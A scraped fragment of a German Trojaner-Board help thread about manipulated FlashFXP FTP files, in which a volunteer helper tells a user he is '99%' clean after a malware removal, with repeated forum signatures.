Wie sicher kann ich jetzt sein aktuell *Frei* von Ungezifer zu sein ?

schrauber · 05.04.2015, 13:16

99%

29.03.2015, 08:50	#8
schrauber /// the machine /// TB-Ausbilder	FTPs Flash FXP Dateien Manipuliert Die Datei ist angeblich nicht vorhanden, aber zur SIcherheit kannste die oberste Zeile weg lassen. __________________ gruß, schrauber *Proud Member of UNITE and ASAP since 2009* Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM!

05.04.2015, 13:16	#12
schrauber /// the machine /// TB-Ausbilder	FTPs Flash FXP Dateien Manipuliert 99% __________________ gruß, schrauber *Proud Member of UNITE and ASAP since 2009* Spenden Anleitungen und Hilfestellungen Trojaner-Board Facebook-Seite Keine Hilfestellung via PM!

FTPs Flash FXP Dateien Manipuliert

Log-Analyse und Auswertung: FTPs Flash FXP Dateien Manipuliert